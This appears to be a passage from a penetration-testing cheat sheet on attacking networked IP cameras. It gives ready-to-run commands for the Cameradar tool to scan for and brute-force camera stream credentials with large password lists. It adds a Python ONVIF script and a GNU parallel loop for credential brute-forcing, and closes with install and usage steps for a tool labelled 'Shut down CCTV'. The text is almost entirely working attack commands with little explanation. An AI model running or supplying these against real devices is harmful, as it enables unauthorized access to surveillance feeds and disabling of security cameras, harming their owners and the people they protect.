git clone https://github.com/Ullaakut/cameradar
cd cameradar
# scan for default ports
docker run --net=host -t ullaakut/cameradar -t $ip
# bruteforce
docker run -t ullaakut/cameradar -t $ip -p $port -T 3s -s 3 -d
# with custom wordlist
docker run ullaakut/cameradar -t -v /usr/share/seclists/Passwords/Common-Credentials:/tmp/dictionaries -c "tmp/dictionaries/10-million-password-list-top-1000000.json" -t $ip
ONVIF
If you receive long output in XML markup, then this device has support for the ONVIF protocol. ONVIF does not have a standard port, usually this protocol is found on ports 8899, 80, 8080, 5000, 6688.
# python script
from onvif import ONVIFCamera
mycam = ONVIFCamera('192.168.0.2', 80, 'user', 'passwd', '/etc/onvif/wsdl/')
# Get Hostname
resp = mycam.devicemgmt.GetHostname()
print 'My camera`s hostname: ' + str(resp.Name)
# Get system date and time
dt = mycam.devicemgmt.GetSystemDateAndTime()
tz = dt.TimeZone
year = dt.UTCDateTime.Date.Year
hour = dt.UTCDateTime.Time.Hour
Bruteforce
Python Script :
import sys
from onvif import ONVIFCamera
if len(sys.argv) < 4:
user = ''
else:
user = sys.argv[3]
if len(sys.argv) < 5:
password = ''
else:
password = sys.argv[4]
mycam = ONVIFCamera(sys.argv[1], sys.argv[2], user, password, '/usr/local/lib/python3.9/site-packages/wsdl/')
resp = mycam.devicemgmt.GetDeviceInformation()
print (str(resp))
Launch it :
parallel -j2 -a usernames.txt -a passwords.txt 'python3 bruteforcer.py $ip $port 2>/dev/null {1} {2}'
Shut down CCTV
# install
export GO111MODULE=on
go get github.com/ullaakut/camerattack@latest
cd $GOPATH/src/github.com/ullaakut/camerattack
go install
# usage
camerattack rtsp://0.0.0.0:8554/live.sdp
